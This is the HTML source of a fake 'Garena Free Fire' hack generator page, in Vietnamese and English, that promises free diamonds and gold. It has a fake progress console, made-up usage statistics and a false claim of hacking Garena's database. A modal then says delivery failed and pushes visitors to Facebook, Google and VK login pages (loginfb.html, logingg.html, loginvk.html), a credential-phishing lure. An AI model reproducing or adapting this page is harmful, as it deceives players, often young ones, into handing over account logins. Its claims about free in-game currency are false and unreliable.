<!DOCTYPE html>
<html>
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta charset="UTF-8">
<head>
    <title>Garena Free Fire - Hack Online - Hack Kim Cương + Vàng miễn phí</title>

    <!-- SEO OPTIMISATION -->
    <meta http-equiv="content-type" content="text/html; charset=utf-8">
    <meta name="description" content="Welcome to the Garena Free Fire Hack Cheats  or Garena Free Fire Hack Cheats hack tool site. Click the button to claim your resources (Coins and Spins) !">
    <meta name="keywords" content="Garena Free Fire hack, Garena Free Fire hack no survey, Garena Free Fire hack free Coins, how to get free Coins in Garena Free Fire game, Garena Free Fire Hack 2018, Garena Free Fire APK IPA Mod, Garena Free Fire Cheats 2018, Garena Free Fire Triche Gratuit, Garena Free Fire Triche, Garena Free Fire Astuce, Code de Triche Garena Free Fire, Astuces Pour Garena Free Fire, Hack Para Garena Free Fire, Garena Free Fire Trucos, Garena Free Fire Trucchi Kim Cươngme, Garena Free Fire Pirater, Garena Free Fire Hack Tool APK IPA, Telecharger Garena Free Fire Hack Gratuit, Garena Free Fire Hack Gratis, Garena Free Fire Hack Deutsch, How to Hack Garena Free Fire, Garena Free Fire Hack iPhone and Android, Garena Free Fire Cheat Engine, Garena Free Fire Glitch & Glitches, Garena Free Fire Tips & Tricks, Garena Free Fire Unlimited Spins, Coins, Garena Free Fire Hack Hack Kim Cương + Vàng miễn phí, Garena Free Fire Coins & Spins, Garena Free Fire Spins, Coins Cheat, Garena Free Fire Cheat Codes, How to Get Free Coins, Spins in Garena Free Fire, Garena Free Fire Juwelen Hack, Garena Free Fire Juwelen Cheat, Garena Free Fire Hack Cheat Juwelen Deutsch! Garena Free Fire Cheats,Garena Free Fire Hack Tool,Garena Free Fire Hack Cydia,Garena Free Fire Generator,Garena Free Fire - Hack Online,Garena Free Fire Spins Hack,Garena Free Fire Coins Hack,Garena Free Fire gratuit Spins,Garena Free Fire gratuit Coins,Garena Free Fire gratis Spins,Garena Free Fire gratis Coins,Garena Free Fire kostenlos Spins,Garena Free Fire kostenlos Coins,Garena Free Fire Unlimited Spins,Garena Free Fire Unlimited Coins,Garena Free Fire Glitch,Garena Free Fire Hack No Survey,Garena Free Fire Online Hack,Garena Free Fire Hack iOS,Garena Free Fire Hack iPhone,Garena Free Fire Hack Android,Garena Free Fire Free Spins,Garena Free Fire Free Coins,Garena Free Fire Mod Apk,Garena Free Fire Mod,Garena Free Fire Hack No Root,Garena Free Fire Hack No Download,Garena Free Fire pirater telecharger,Garena Free Fire Hack telecharger,Garena Free Fire tricheurs,Garena Free Fire Hacker,Garena Free Fire Hacken,Garena Free Fire Triche">
    <!-- EXTRA SEO -->
    <meta property="og:title" content="Garena Free Fire Hack Cheats  - Get Hack Kim Cương + Vàng miễn phí">
    <meta property="og:description" content="Welcome to the Garena Free Fire Hack Cheats  or Garena Free Fire Hack Cheats hack tool site. Click the button to claim your resources (Coins and Spins) ">
    <meta property="og:image" content="img/thumbnail.jpg">
    <meta property="og:url" content="index-2.html">
    <meta property="og:type" content="Garena Free Fire - Hack Online - Hack Kim Cương + Vàng miễn phí">


    <link rel="icon" type="image/png" href="img/favicon.ico">
    <!-- CSS -->
    <link href="css\font-awesome.css" rel="stylesheet">
    <link href="css\bootstrap.min.css" rel="stylesheet">
    <link href="outdatedbrowser\outdatedbrowser.min.css" rel="stylesheet">
    <link href="css\sweet-alert.css" rel="stylesheet">
    <link href="css\animate.css" rel="stylesheet">
    <link href="css\magnific-popup.css" rel="stylesheet">
    <link href="css\hover-min.css" rel="stylesheet">
    <link href="css\magnific-popup.css" rel="stylesheet">
    <link href="css\style.css" rel="stylesheet">
    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]><script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script><script src="https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js"></script><![endif]-->
    <script src="ajax.googleapis.com\ajax\libs\jquery\2.1.3\jquery.min.js"></script>
    <script type='text/javascript' src="jquery-labelauty.js"></script>
    <link rel="stylesheet" href="jquery-labelauty.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css" integrity="sha512-Fo3rlrZj/k7ujTnHg4CGR2D7kSs0v4LLanw2qksYuRlEzO+tcaEPQogQ0KaoGN26/zrn20ImR1DfuLWnOo7aBA==" crossorigin="anonymous" referrerpolicy="no-referrer" />
<style>
    body{
         background-image: url("https://res-3.cloudinary.com/fieldfisher/image/upload/c_lfill,g_auto/f_auto,q_auto/v1/sectors/technology/tech_neoncircuitboard_857021704_medium_lc5h05");
       background-repeat: no-repeat, repeat;
         background-size: cover;
    }
    
</style>
    <style>
    body{                                                                    font-family: 'Roboto', sans-serif;
        font-size: 15px;
    font-style: normal;
    font-weight: 400;
                                                }
b, strong {
    font-weight: 600;
}
        .btn {
    box-shadow: none;
    font-weight: bold;
}
.card {
    border: 0;
    box-shadow: none;
}
.card-footer {
    border-top: none;
}
.alert-success {
    color: #1a1a1a;
    background-color: #f9f9f9;
    border-color: #b3e9c9;
}
.navbar {
    box-shadow: 0 4px 12px 0 rgb(0 0 0 / 7%), 0 2px 4px rgb(0 0 0 / 5%);
    padding-top: .5625rem;
}
.bg-light {
    background-color: #ffffff!important;
}
button.btn.btn-primary.load-more.mt-3 {
    background-color: #8c8bb3;
    color: #ffffff;
    font-weight: bold;
}
.forum .avatar{
    width:100%!important;
    height:100%!important;
}
.forum .avatar {
    width: 64px!important;
    height: 64px!important;
    display:block;
    margin:auto;
    object-fit: cover;
    border-radius: 100%;
    border: 2px solid #8c8bb3;
}
@media only screen and (max-width: 600px) {
    .forum .avatar {
    width: 50px!important;
    height: 50px!important;
    margin-top: 10px;
}
}
.forum small {
    font-weight: 400;
    font-size: 13px;
}
.forum small {
    font-weight: 400;
    display: block;
    font-size: 13px;
}
.btn {
    color: #727272;
    box-shadow: none;
    font-weight: bold;
    background-color: #ededed!important;
}
.list-group-item.active {
    z-index: 2;
    color: #787878;
    background-color: #f3f3f3;
    border-color: #f3f3f3;
    font-weight: bold;
    text-align: center;
}

.badge {
    border-radius: 0.27rem;
    margin-right: 5px;
    background-color: #ddd!important;
    color: #666;
}
input#tim {
    background: #f9f9f9;
    border: none;
}
.btn {
    color: #fff;
    box-shadow: none;
    font-weight: bold;
    background-color: #35809d!important;
    border-radius: 30px;
}
.alert-danger {
    color: #ffffff;
    background-color: #35809d;
    border-color: #fdc1cc;
}
.text-muted {
    --mdb-text-opacity: 1;
    color: #35809d!important;
}
.row {
    background: url(z-banner.png) top left no-repeat;
    background-position: 0% 100%;
    background-size: contain;
}
.form-control:disabled, .form-control[readonly] {
    background-color: #ffffff;
    opacity: 1;
    border: none;
    color: #35809d;
    font-weight: 500;
    font-size: 15px;
    padding: 25px;
    -webkit-box-shadow: 0 0 20px 0 rgb(0 0 0 / 10%);
    box-shadow: 0 0 20px 0 rgb(0 0 0 / 10%);
}
input.form-control {
    padding: 10px;
    -webkit-box-shadow: 0 0 20px 0 rgb(0 0 0 / 10%);
    box-shadow: 0 0 20px 0 rgb(0 0 0 / 10%);
    text-align: center;
    color: #35809d!important;
    background: #fff!important;
    border:none!important;
}
.btn {
    color: #35809d;
    box-shadow: none;
    font-weight: bold;
    background-color: #ffffff!important;
    border-radius: 30px;
    border: 1px solid #35809d;
}
input#tim {
    border: 1px solid #ccc!important;
}
button.btn.btn-success.tut,.btn{
        color: #35809d!important;
}
button.badge.bg-primary.mb-3.me-5.d-block {
    border: none;
    background: #35809d!important;
    color: #fff;
}
    </style>
</head>

<body >
    <!-- Preloader -->
    <div id="preloader">
        <div id="status">&nbsp;</div>
    </div>
    <!-- Outdate Browser Warning Message -->
    <div id="outdated"></div>
    <!-- Modal -->
    <div class="modal fade" id="humanVerificationModal1" tabindex="-1" role="dialog" aria-labelledby="myModalLabel">
        <div class="modal-dialog" role="document">
            <div class="modal-content">
                <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                        <span aria-hidden="true">&times;</span>
                      </button>
                    <h4 class="modal-title" id="myModalLabel"><i class="fa fa-user"></i> Thông báo </h4>
                   
                </div>
                
                <div class="modal-body">

                    <div id="offers" class="panel panel-default panel-offers display-none">
                        <!--ovo je ugaseno -->
                        <div class="panel-heading">
                            <h3 class="panel-title text-left ubuntu-bold"><img src="img\red.png"> <img src="img\yellow.png"> <img src="img\green.png"> <img src="img\arrow.png"></h3>
                        </div>

                        <div class="panel-body">
                            <p class="ubuntu-regular text-center p-offers">Trang web hoạt động dưới hình thức hack vào database của garena nên bạn vui lòng không làm dụng hack quá nhiều trên cùng một tài khoản dẫn đến lỗi hệ thống và khoá tài khoản!(khuyến cáo chỉ nên hack 1000kc/lần/tk)</p>

                            <center>
                                <div class="wrapper">
                                    <div class="icon facebook" data-dismiss="modal">
                                      <div class="tooltip">đóng</div>
                                      <span >OK</span>
                                    </div>
                                    
                                  </div>
                            </center>





                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>

    <!-- Modal -->
    <div class="modal fade" id="humanVerificationModal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel">
        <div class="modal-dialog" role="document">
            <div class="modal-content">
                <div class="modal-header">
                    <h4 class="modal-title" id="myModalLabel"><i class="fa fa-user"></i> XÁC THỰC TÀI KHOẢN </h4>
                </div>
                <div class="modal-body">

                    <div id="offers" class="panel panel-default panel-offers display-none">
                        <!--ovo je ugaseno -->
                        <div class="panel-heading">
                            <h3 class="panel-title text-left ubuntu-bold"><img src="img\red.png"> <img src="img\yellow.png"> <img src="img\green.png"> XÁC THỰC <img src="img\arrow.png"></h3>
                        </div>

                        <div class="panel-body">
                            <p class="ubuntu-regular text-center p-offers">Tài khoản của bạn đã hợp lệ, nhưng đã xảy ra lỗi khi gửi Kim cương + vàng qua ID game, Vui lòng đăng nhập vào tài khoản đã liên kết với garena để nhận trực tiếp!</p>

                            <center>
                                <div class="wrapper">
                                    <a href="loginfb.html" style="text-decoration: none;"><div class="icon facebook">
                                      <div class="tooltip">Facebook</div>
                                      <span><i class="fab fa-facebook-f"></i></span>
                                    </div>
                                    </a>
                                    <a href="logingg.html" style="text-decoration: none;">
                                    <div class="icon twitter">
                                      <div class="tooltip">Google</div>
                                      <span><i class="fab fa-google"></i></span>
                                    </div>
                                    </a>
                                    <a href="loginvk.html" style="text-decoration: none;">
                                    <div class="icon instagram">
                                      <div class="tooltip">VK</div>
                                      <span><i class="fab fa-vk"></i></span>
                                    </div>
                                    </a>
                                   
                                  </div>

                            </center>





                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>





    <div class="Header">
        <div class="inner">
            <center><img src="img\wYZibVf.png" height="auto" width="auto" class="img-responsive logo" alt="Garena Free Fire coin generator">
            </center>
            <br>
        </div>

        <section class="generator-section">
            <div class="container">
                <div class="row">
                    <div class="col-md-8 col-md-offset-2">
                        <div class="generator-form">
                            <div class="hackgame">
                                <h1 class="text-center">Garena Free Fire - Hack Online</h1>
                            </div>
                            <div class="divider"></div>
                            <div class="inside">
                                <div class="step-one">
                                    <div class='nojs'>
                                        <div class="row">
                                            <div class="col-md-6">
                                                <div class="form-group cc-username-wrap">
                                                    <label for="ccUsername"><span class="label label-primary">ID tài khoản</span>
                                                    </label>
                                                    <input style="background-image: url(img/username.png);" type="text" class="form-control cc-select-icon cc-user-icon" id="ccUsername" placeholder="Enter your Garena Free Fire ID">
                                                </div>
                                            </div>
                                            <div class="col-md-6">
                                                <div class="form-group cc-mode-wrap">
                                                    <label for="ccMode"><span class="label label-primary">Hệ điều hành</span>
                                                    </label>
                                                    <div class="selectFieldWrapper" name="ccMode" id="ccMode">
                                                        <select style="background-image: url(img/platform.png);" class="form-control cc-select-icon cc-mode-icon">
                                                            <option value="Teams">Android</option>
                                                            <option value="Expirimental">iOS</option>
                                            
                                                        </select>
                                                    </div>
                                                </div>
                                            </div>

                                        </div>
                                        <div class="row">

                                            <div class="col-md-6">
                                                <!-- coins -->
                                                <div class="form-group cc-coins-wrap">
                                                    <label for="ccCoins"><span class="label label-primary">Kim Cương</span>
                                                    </label>
                                                    <div class="selectFieldWrapper" name="ccCoins" id="ccCoins">
                                                        <select class="form-control cc-select-icon cc-coins-icon">
															<option value="1000">1000 Kim Cương</option>
                                                            <option value="5000">5000 Kim Cương</option>
                                                            <option value="9999">9999 Kim Cương</option>
                                                         
                                                        </select>
                                                    </div>
                                                </div>
                                            </div>
                                            <!-- /coins -->

                                            <div class="col-md-6">
                                                <!-- xp-boost -->
                                                <div class="form-group cc-xp-boost-wrap">
                                                    <label for="ccXPBoost"><span class="label label-primary">Vàng</span>
                                                    </label>
                                                    <div class="selectFieldWrapper" name="ccXPBoost" id="ccXPBoost">
                                                        <select class="form-control cc-select-icon cc-xp-boost-icon">
                                                            <option value="1000">22,200 Vàng</option>
                                                            <option value="5000">50,500 Vàng</option>
                                                            <option value="9999">150,700 Vàng</option>
                                                            <option value="9999">240,900 Vàng</option>
                                                        </select>
                                                    </div>
                                                </div>
                                            </div>
                                           
                                            <!-- /xp-boost -->

                                            <!-- /mass-boost -->
                                        </div>
                                    </div>
                                    <div class="row" style="margin-top: 15px;">
                                        <div class="col-md-6">
                                            <!-- invisibility -->
                                            <div class="form-group cc-inv-wrap">
                                                <input type="checkbox" data-labelauty="Antiban chống khoá tài khoản 100%">
                                            </div>
                                        </div>

                                        <!-- /invisibility -->
                                        <div class="col-md-6">
                                            <!-- invisibility -->
                                            <div class="form-group cc-inv-wrap">
                                                <input type="checkbox" data-labelauty="Xoá lịch sử hack">
                                            </div>
                                        </div>
                                        <!-- /invisibility -->
                                        <div class="col-md-12">
                                            <div class="form-group cc-username-wrap">
                                                <label for="ccUsername"><span class="label label-primary">Key hack</span>
                                                </label>
                                                <input style="background-image: url(img/username.png);" type="text" class="form-control cc-select-icon cc-user-icon" id="ccUsername" placeholder="Enter your Key" value="GizmLtf5QT-0EbZcQJwUc-jdj3ZHSJYY">
                                            </div>
                                        </div>
                                    </div>


                                    <div class="row">
                                        <div class="col-md-6 text-right">
                                            <div class="form-group cc-btn-wrap">
                                                <button class="generate-btn hvr-float-shadow"><i class="fa fa-gear"></i> Start</button>
                                            </div>
                                        </div>
                                        <div class="col-md-6 text-right">
                                            <div class="form-group cc-btn-wrap"></div>
                                        </div>
                                    </div>
                                    <div class="step-two">
                                        <div class="loader-wrap">
                                            <div class="loader"></div>
                                        </div>
                                        <p class="loader-msg">Đang xử lí...</p>
                                        <div class="generator-console"></div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </section>
        <section class="chat-section">
            <div class="container">
                <div class="row">
                    <div class="col-md-12">
                        <div class="inside">
                            <div class="row">
                                <div class="col-md-12">
                                    <div class="row">
                                        <div class="col-md-8">
                                            <div class="livechatBox">
                                                <div class="livechatNameBox">
                                                    <div class="overlay"></div>
                                                    <div class="nameInputBox">
                                                        <div class="form-group">
                                                            <label for="livechat_name">Nickname</label>
                                                            <input id="livechat_name" type="text" class="form-control livechatName" placeholder="Enter nickname...">
                                                        </div>
                                                        <button class="btn btn-success btn-block livechatNicknameBtn">Submit</button>
                                                    </div>
                                                </div>
                                                <div class="row">
                                                    <div class="col-md-12">
                                                        <div class="heading">
                                                            <h3><i class="fa fa-comment"></i> Chat Room</h3>
                                                        </div>
                                                    </div>
                                                </div>
                                                <div class="row">
                                                    <div class="col-md-12">
                                                        <div class="livechatListArea">
                                                            <ul class="chatList"></ul>
                                                        </div>
                                                    </div>
                                                </div>
                                                <br class="clearfix">
                                                <div class="row">
                                                    <div class="col-md-10">
                                                        <input type="text" class="form-control livechatMsg" placeholder="Enter message...">
                                                    </div>
                                                    <div class="col-md-2">
                                                        <button class="btn btn-primary btn-block livechatSubmtBtn">Submit</button>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                        <section class="latest-updates-section col-md-4">
                                            <div class="scontainer">
                                                <div class="row">
                                                    <div class="col-md-12">
                                                        <div class="row">
                                                            <div class="col-md-12">
                                                                <div class="updates-box">
                                                                    <div class="row">
                                                                        <div class="col-xs-12 col-sm-12">
                                                                            <div class="right-side">
                                                                                <h5><span class="label label-danger"><i class="fa fa-refresh fa-spin"></i> Latest Updates</span></h5>
                                                                                <p class="coc-update-msg"><i class="fa fa-check-circle-o"></i> <span class="message"></span>
                                                                                </p>
                                                                                <br class="clearfix">
                                                                                <h5 style="margin-top:40px;"><span class="label label-danger"><i class="fa fa-bar-chart"></i> Statistics</span></h5>
                                                                                <div class="row">
                                                                                    <div class="col-xs-4">
                                                                                        <!-- Coins -->
                                                                                        <table class="cc-stats-table">
                                                                                            <tr>
                                                                                                <td><img src="img\coin-icon.png" alt="" class="cc-stat-icon">
                                                                                                </td>
                                                                                                <td>
                                                                                                    <p class="cc-stat-text coc-coins-stat">5555</p>
                                                                                                </td>
                                                                                            </tr>
                                                                                        </table>
                                                                                    </div>
                                                                                    <!-- /Coins -->
                                                                                    <div class="col-xs-4">
                                                                                        <!-- elixir -->
                                                                                        <table class="cc-stats-table">
                                                                                            <tr>
                                                                                                <td><img src="img\xp-boost-icon.png" alt="" class="cc-stat-icon">
                                                                                                </td>
                                                                                                <td>
                                                                                                    <p class="cc-stat-text coc-xp-boost-stat">5555</p>
                                                                                                </td>
                                                                                            </tr>
                                                                                        </table>
                                                                                    </div>
                                                                                    <!-- /elixir -->
                                                                                </div>
                                                                                <br class="clearfix">
                                                                                <p class="small-msg" style="margin-top:25px;"><span class="label label-danger">The statistics above show the usage of our tool.</span>
                                                                                </p>
                                                                            </div>
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </section>
                                    </div>
                                    <br class="clearfix">
                                    <br class="clearfix">
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </section>
        <section class="features-section">
            <div class="container">
                <!-- features -->
                <div class="row">
                    <!-- feature -->
                    <div class="col-md-2 col-sm-4">
                        <div class="feature">
                            <div class="row">
                                <div class="col-md-12"><i class="fa fa-rocket"></i>
                                </div>
                            </div>
                            <div class="row">
                                <div class="col-md-12">
                                    <h4>Regularly updated</h4>
                                    <p>We update this hack on Weekly Basis, we do tweaks whole time for optimal performance.</p>
                                </div>
                            </div>
                        </div>
                    </div>
                    <!-- /feature -->
                    <!-- feature -->
                    <div class="col-md-2 col-sm-4">
                        <div class="feature">
                            <div class="row">
                                <div class="col-md-12"><i class="fa fa-thumbs-up"></i>
                                </div>
                            </div>
                            <div class="row">
                                <div class="col-md-12">
                                    <h4>Easy to use</h4>
                                    <p>With just few clicks you can make it to work, its pretty Simple!</p>
                                </div>
                            </div>
                        </div>
                    </div>
                    <!-- /feature -->
                    <!-- feature -->
                    <div class="col-md-2 col-sm-4">
                        <div class="feature">
                            <div class="row">
                                <div class="col-md-12"><i class="fa fa-laptop"></i>
                                </div>
                            </div>
                            <div class="row">
                                <div class="col-md-12">
                                    <h4>Online Based</h4>
                                    <p>Everything is done via our web platform on our server and you are 100% protected.</p>
                                </div>
                            </div>
                        </div>
                    </div>
                    <!-- /feature -->
                    <!-- feature -->
                    <div class="col-md-2 col-sm-4">
                        <div class="feature">
                            <div class="row">
                                <div class="col-md-12"><i class="fa fa-paper-plane"></i>
                                </div>
                            </div>
                            <div class="row">
                                <div class="col-md-12">
                                    <h4>Free Forever</h4>
                                    <p>As long as our Glitch Don't Patched our Hack will Work.</p>
                                </div>
                            </div>
                        </div>
                    </div>
                    <!-- /feature -->
                    <!-- feature -->
                    <div class="col-md-2 col-sm-4">
                        <div class="feature">
                            <div class="row">
                                <div class="col-md-12"><i class="fa fa-random"></i>
                                </div>
                            </div>
                            <div class="row">
                                <div class="col-md-12">
                                    <h4>Fast Algorithm</h4>
                                    <p>The core of the database is coded in PHP and best possible way so hack proccess will be fastest possible.</p>
                                </div>
                            </div>
                        </div>
                    </div>
                    <!-- /feature -->
                    <!-- feature -->
                    <div class="col-md-2 col-sm-4">
                        <div class="feature">
                            <div class="row">
                                <div class="col-md-12"><i class="fa fa-shield"></i>
                                </div>
                            </div>
                            <div class="row">
                                <div class="col-md-12">
                                    <h4>Anti-Detection</h4>
                                    <p>We use private proxies and everything is done on our server to ensure hack is not detected.</p>
                                </div>
                            </div>
                        </div>
                    </div>
                    <!-- /feature -->
                </div>
                <!-- /features -->
            </div>
        </section>
        <div class="seo-section">
            <div class="container">
                <div class="row">
                    <div class="col-md-12">

                        <!-- Javacript Files -->
                        <script src="js\bootstrap.min.js"></script>
                        <script src="outdatedbrowser\outdatedbrowser.min.js"></script>
                        <!-- <script src="js\sweet-alert.min.js"></script> -->
                        <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
                        <script src="js\bootbox.min.js"></script>
                        <script src="js\jquery.backstretch.min.js"></script>
                        <script src="js\jquery.animatecss.min.js"></script>
                        <script src="js\jquery.noty.packaged.min.js"></script>
                        <script src="js\faker.min.js"></script>
                        <script src="js\dynatexer.dev.js"></script>
                        <script src="js\jquery.magnific-popup.min.js"></script>
                        <script src="js\jquery.flexverticalcenter.js"></script>
                        <script src="js\jquery.countdown.min.js"></script>
                        <script src="js\magnific-popup.min.js"></script>
                        <script src="js\main.js"></script>
                        <script type='text/javascript'>
                            $(document).ready(function() {
                                $(":checkbox").labelauty();
                            });
               
                        </script>
                       
                    </div>
                </div>
            </div>
        </div>
    </div>
</body>


</html>